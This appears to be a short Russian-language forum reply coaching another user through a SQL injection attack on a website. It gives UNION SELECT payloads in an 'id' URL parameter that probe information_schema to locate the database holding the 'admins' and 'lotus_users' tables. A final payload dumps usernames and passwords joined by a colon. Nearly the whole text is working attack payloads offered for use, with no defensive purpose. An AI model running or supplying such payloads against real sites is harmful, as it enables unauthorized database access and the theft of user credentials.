?id=-10+union+select+1,2,table_schema,4,5,6,7,8+from+information_schema.columns+where+table_name='admins'+limit+1,1--
и
?id=-10+union+select+1,2,table_schema,4,5,6,7,8+from+information_schema.columns+where+table_name='lotus_users '+limit+1,1--
если результат будет разный, то точно в разных БД. Тебе надо запомнить, что выдаст во втором случае
И тогда попробуй так:
?id=-10+union+select+1,2,concat(username,char(58),user_password),4,5,6,7,8+from+ЗДЕСЬ_РЕЗУЛЬТАТ_ВТОРОГО_ЗАПРОСА.lotus_users+limit+1,1--
ЗЫЖ: непонятно тогда как ты вообще узнал эти переменные - username,user_password